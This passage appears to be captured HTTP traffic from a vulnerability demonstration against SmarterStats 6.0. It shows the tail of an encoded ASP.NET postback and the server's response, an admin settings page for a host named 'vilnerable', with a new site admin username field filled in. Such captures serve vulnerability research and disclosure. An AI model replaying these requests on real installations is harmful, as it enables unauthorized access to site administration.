IEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2F%2F%2F%2FkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2F%2F%2F%2F8%2F%2F%2F%2FBgcAAAAEVGV4dAoB%2BP%2F%2F%2F%2Fz%2F%2F%2F8GCQAAAApSZXNvdXJjZUlEBgoAAAAHQExvZ0ZUUAH1%2F%2F%2F%2F%2FP%2F%2F%2FwYMAAAACFNlbGVjdGVkCAEAAfP%2F%2F%2F%2F8%2F%2F%2F%2FBg4AAAAKUGFnZVZpZXdJRAYPAAAACUxvZ0ZUUFRhYgtkBSZjdGwwMCRUUEgkSHlwZXJUYWJTdHJpcDEkSHlwZXJUYWJJdGVtMg8y3AsAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8%2F%2F%2F%2F5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2F%2F%2F%2F%2FP%2F%2F%2FwYHAAAABFRleHQKAfj%2F%2F%2F%2F8%2F%2F%2F%2FBgkAAAAKUmVzb3VyY2VJRAYKAAAAC0BMb2dPcHRpb25zAfX%2F%2F%2F%2F8%2F%2F%2F%2FBgwAAAAIU2VsZWN0ZWQIAQAB8%2F%2F%2F%2F%2Fz%2F%2F%2F8GDgAAAApQYWdlVmlld0lEBg8AAAANTG9nT3B0aW9uc1RhYgtkBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WGQUkY3RsMDAkTVBIJGNoa1Nlb0VuYWJsZWRfU2V0dGluZ0NoZWNrBShjdGwwMCRNUEgkY2hrU3RyaXBBZnRlclNlbWlfU2V0dGluZ0NoZWNrBUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDAFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMQVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQyBUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDMFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkNAVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQ1BUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDYFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkNwVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQ4BUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDkFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTAFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTEFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTIFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTMFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTQFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTUFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTYFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTcFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTgFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMTkFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMjAFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMjEFSWN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMjEFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW0xDzLWCwABAAAA%2F%2F%2F%2F%2FwEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2F%2F%2F%2FkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2F%2F%2F%2F8%2F%2F%2F%2FBgcAAAAEVGV4dAoB%2BP%2F%2F%2F%2Fz%2F%2F%2F8GCQAAAApSZXNvdXJjZUlEBgoAAAAIQE9wdGlvbnMB9f%2F%2F%2F%2Fz%2F%2F%2F8GDAAAAAhTZWxlY3RlZAgBAAHz%2F%2F%2F%2F%2FP%2F%2F%2FwYOAAAAClBhZ2VWaWV3SUQGDwAAAApPcHRpb25zVGFiC2QFGWN0bDAwJE1QSCRQYWdlSWRlbnRpZmllcjEPBSA2NzA2YjYxZDhmYjg0MDhkYjBiZDdkYWY5OTU2ZTNlY2QFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW03DzLaCwABAAAA%2F%2F%2F%2F%2FwEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA%2BQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2F%2F%2F%2FkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2F%2F%2F%2F8%2F%2F%2F%2FBgcAAAAEVGV4dAoB%2BP%2F%2F%2F%2Fz%2F%2F%2F8GCQAAAApSZXNvdXJjZUlEBgoAAAAKQExvZ1N0YXR1cwH1%2F%2F%2F%2F%2FP%2F%2F%2FwYMAAAACFNlbGVjdGVkCAEAAfP%2F%2F%2F%2F8%2F%2F%2F%2FBg4AAAAKUGFnZVZpZXdJRAYPAAAADExvZ1N0YXR1c1RhYgtkX5dB0MWxfpOHdZB%2BIBMIEdqpxe094wua6ZwWPljnYkU%3D&__ASYNCPOST=true&

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 21:18:40 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 63047

1|#||4|11|updatePanel|ctl00_UpdatePanel1|
               
           |1411|updatePanel|ctl00_TPH_UpdatePanel1|
           
<!-- HyperTabStrip -->
<div class='htsTabStrip htsTabBar'><ul id='ctl00_TPH_HyperTabStrip1'>
   <li class='htsItem htsFirst htsSelected' id='ctl00_TPH_HyperTabStrip1_HyperTabItem1'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Options</span></span></a></li>
   <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem2'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Log Options</span></span></a></li>
   <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem3'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Log Locations</span></span></a></li>
   <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem5'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>SEO Options</span></span></a></li>
   <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem7'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Log Status</span></span></a></li>
   <li class='htsItem htsLast' id='ctl00_TPH_HyperTabStrip1_HyperTabItem8'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>SEO Processing Status</span></span></a></li>
</ul>
<input type="hidden" name="ctl00$TPH$HyperTabStrip1$SelectedTab" id="ctl00_TPH_HyperTabStrip1_SelectedTab" value="ctl00_TPH_HyperTabStrip1_HyperTabItem1" /><div class='htsClear'><div class='ie6fix'>&nbsp;</div></div></div>

       |28417|updatePanel|ctl00_MPH_UpdatePanel5|
           
           <a id="ctl00_MPH_btnUpdateIISImport" href="javascript:__doPostBack(&#39;ctl00$MPH$btnUpdateIISImport&#39;,&#39;&#39;)" style="display: none"></a>
           <a id="ctl00_MPH_btnRefresh" href="javascript:__doPostBack(&#39;ctl00$MPH$btnRefresh&#39;,&#39;&#39;)" style="display: none"></a>
           
<!-- HyperMultiPage -->
<div class='' id='ctl00_MPH_MP1'>
   <input type="hidden" name="ctl00$MPH$VisiblePage" id="ctl00_MPH_VisiblePage" value="ctl00_MPH_OptionsTab" />
               <div id='ctl00_MPH_OptionsTab' class='' >
       <span id="ctl00_MPH_OptionsTab">
                   <table id="ctl00_MPH_tblAdminMain" class="SettingsContainer" border="0">
           <tr id="ctl00_MPH_txtDomainName">
               <td id="ctl00_MPH_txtDomainName_Label" class="Indent Fixed">Site Name</td><td id="ctl00_MPH_txtDomainName_Setting" class="Setting"><input name="ctl00$MPH$txtDomainName_SettingText" type="text" value="vilnerable.smarterstats.6.0.host" size="50" id="ctl00_MPH_txtDomainName_SettingText" class="text" /></td>
           </tr><tr id="ctl00_MPH_txtDomainUrl">
               <td id="ctl00_MPH_txtDomainUrl_Label" class="Indent Fixed">Site Url</td><td id="ctl00_MPH_txtDomainUrl_Setting" class="Setting"><input name="ctl00$MPH$txtDomainUrl_SettingText" type="text" size="50" id="ctl00_MPH_txtDomainUrl_SettingText" class="text" /></td>
           </tr><tr id="ctl00_MPH_txtSiteId">
               <td id="ctl00_MPH_txtSiteId_Label" class="Indent Fixed">Site ID</td><td id="ctl00_MPH_txtSiteId_Setting" class="Setting"><span id="ctl00_MPH_txtSiteId_ReadOnlyLabel">1</span></td>
           </tr><tr id="ctl00_MPH_lstServer">
               <td id="ctl00_MPH_lstServer_Label" class="Indent Fixed">Server</td><td id="ctl00_MPH_lstServer_Setting" class="Setting"><select name="ctl00$MPH$lstServer_SettingDropDown" id="ctl00_MPH_lstServer_SettingDropDown">
                   <option selected="selected" value="1">localhost</option>

               </select></td>
           </tr><tr id="ctl00_MPH_lstStatus">
               <td id="ctl00_MPH_lstStatus_Label" class="Indent Fixed">Current State</td><td id="ctl00_MPH_lstStatus_Setting" class="Setting"><select name="ctl00$MPH$lstStatus_SettingDropDown" id="ctl00_MPH_lstStatus_SettingDropDown">
                   <option selected="selected" value="start">Started</option>
                   <option value="paused">Paused</option>
                   <option value="disabled">Disabled</option>

               </select></td>
           </tr><tr id="ctl00_MPH_exSettingSmarterLogs">
               <td id="ctl00_MPH_exSettingSmarterLogs_Label" class="Indent Fixed">SmarterLog Path</td><td class=" Setting"><input name="ctl00$MPH$txtSmarterLogDirectory" type="text" value="C:\SmarterLogs" size="40" id="ctl00_MPH_txtSmarterLogDirectory" />
                               <input type="button" value="Browse" onclick="SmarterLogBrowse()" />
                           </td>
           </tr><tr id="ctl00_MPH_lstTimeZone">
               <td id="ctl00_MPH_lstTimeZone_Label" class="Indent Fixed">Time Zone</td><td id="ctl00_MPH_lstTimeZone_Setting" class="Setting"><span id="ctl00_MPH_lstTimeZone_ReadOnlyLabel">(GMT-06:00) Central Time (US & Canada)</span></td>
           </tr><tr id="ctl00_MPH_ddlChangeSiteAdmin">
               <td id="ctl00_MPH_ddlChangeSiteAdmin_Label" class="Indent Fixed">Site Admin</td><td id="ctl00_MPH_ddlChangeSiteAdmin_Setting" class="Setting"><select name="ctl00$MPH$ddlChangeSiteAdmin_SettingDropDown" onchange="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$MPH$ddlChangeSiteAdmin_SettingDropDown\&#39;,\&#39;\&#39;)&#39;, 0)" id="ctl00_MPH_ddlChangeSiteAdmin_SettingDropDown">
                   <option selected="selected" value="">New User</option>
                   <option value="hoytnet">hoytnet</option>

               </select></td>
           </tr>
       </table>
                   <table id="ctl00_MPH_tblAdminCreate" class="SettingsContainer" border="0">
           <tr id="ctl00_MPH_txtAdminNewUserName">
               <td id="ctl00_MPH_txtAdminNewUserName_Label" class="Indent Fixed">Site Admin Username</td><td id="ctl00_MPH_txtAdminNewUserName_Setting" class="Setting"><input name="ctl00$MPH$txtAdminNewUserName_SettingText" type="text" value="weirdo" id="ctl00_MPH_txtAdminNewUserName_SettingText" class="text" /></td>
           </tr><tr id="ctl00_MPH_txtAdminNewPassword">
               <td id="ctl00_MPH_txtAdminNewPassword_Label" class="Indent Fixed">Site Admin Password</td><td id="ctl00_MPH_txtAdminNewPassword_Setting" class="Setting"><input name="ctl00$MPH$txtAdminNewPassword_SettingText" type="password" id="ctl00_MPH_txtAdminNewPassword_SettingText" class="text" autocomplete="off" /></td>
           </tr>
       </table>
                   <table id="ctl00_MPH_SettingsContainer5" class="SettingsContainer" border="0">
           <tr id="ctl00_MPH_chkSeoEnabled">
               <td id="ctl00_MPH_chkSeoEnabled_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkSeoEnabled_Setting" class="Setting"><input id="ctl00_MPH_chkSeoEnabled_SettingCheck" type="checkbox" name="ctl00$MPH$chkSeoEnabled_SettingCheck" checked="checked" onclick="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$MPH$chkSeoEnabled_SettingCheck\&#39;,\&#39;\&#39;)&#39;, 0)" /><label for="ctl00_MPH_chkSeoEnabled_SettingCheck">Enable SEO</label></td>
           </tr>
       </table>
               </span></div>
   
               <div id='ctl00_MPH_LogOptionsTab' class='' style='display:none'>
       <span id="ctl00_MPH_LogOptionsTab">
                   <table id="ctl00_MPH_SettingsContainer2" class="SettingsContainer" border="0">
           <tr id="ctl00_MPH_lstLogLocation">
               <td id="ctl00_MPH_lstLogLocation_Label" class="Indent Fixed">Log Location</td><td id="ctl00_MPH_lstLogLocation_Setting" class="Setting"><select name="ctl00$MPH$lstLogLocation_SettingDropDown" onchange="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$MPH$lstLogLocation_SettingDropDown\&#39;,\&#39;\&#39;)&#39;, 0)" id="ctl00_MPH_lstLogLocation_SettingDropDown">
                   <option selected="selected" value="Local">Local Path or UNC Path</option>
                   <option value="FTP">FTP</option>

               </select></td>
           </tr><tr id="ctl00_MPH_lstLogFormat">
               <td id="ctl00_MPH_lstLogFormat_Label" class="Indent Fixed">Log Format</td><td id="ctl00_MPH_lstLogFormat_Setting" class="Setting"><select name="ctl00$MPH$lstLogFormat_SettingDropDown" id="ctl00_MPH_lstLogFormat_SettingDropDown">
                   <option selected="selected" value="W3Cex">IIS - W3Cex Log Format</option>
                   <option value="IIS">IIS - Microsoft IIS Log Format</option>
                   <option value="NCSA">IIS - NCSA Common Log Format</option>
                   <option value="ApacheCLF">Apache - Common Log Format</option>
                   <option value="ApacheNCSAEx">Apache - NCSA Extended Log Format</option>
                   <option value="IPlanetCLF">IPlanet - Common Log Format</option>
                   <option value="CLF">Other - Common Log Format</option>

               </select></td>
           </tr><tr id="ctl00_MPH_lstMonthsToKeepSmStats">
               <td id="ctl00_MPH_lstMonthsToKeepSmStats_Label" class="Indent Fixed">Auto-Deletion</td><td id="ctl00_MPH_lstMonthsToKeepSmStats_Setting" class="Setting"><select name="ctl00$MPH$lstMonthsToKeepSmStats_SettingDropDown" id="ctl00_MPH_lstMonthsToKeepSmStats_SettingDropDown">
                   <option selected="selected" value="0">Never Delete</option>
                   <option value="1">Delete after 1 months</option>
                   <option value="2">Delete after 2 months</option>
                   <option value="3">Delete after 3 months</option>
                   <option value="4">Delete after 4 months</option>
                   <option value="5">Delete after 5 months</option>
                   <option value="6">Delete after 6 months</option>
                   <option value="7">Delete after 7 months</option>
                   <option value="8">Delete after 8 months</option>
                   <option value="9">Delete after 9 months</option>
                   <option value="10">Delete after 10 months</option>
                   <option value="11">Delete after 11 months</option>
                   <option value="12">Delete after 12 months</option>
                   <option value="13">Delete after 13 months</option>
                   <option value="14">Delete after 14 months</option>
                   <option value="15">Delete after 15 months</option>
                   <option value="16">Delete after 16 months</option>
                   <option value="17">Delete after 17 months</option>
                   <option value="18">Delete after 18 months</option>
                   <option value="19">Delete after 19 months</option>
                   <option value="20">Delete after 20 months</option>
                   <option value="21">Delete after 21 months</option>
                   <option value="22">Delete after 22 months</option>
                   <option value="23">Delete after 23 months</option>
                   <option value="24">Delete after 24 months</option>
                   <option value="25">Delete after 25 months</option>
                   <option value="26">Delete after 26 months</option>
                   <option value="27">Delete after 27 months</option>
                   <option value="28">Delete after 28 months</option>
                   <option value="29">Delete after 29 months</option>
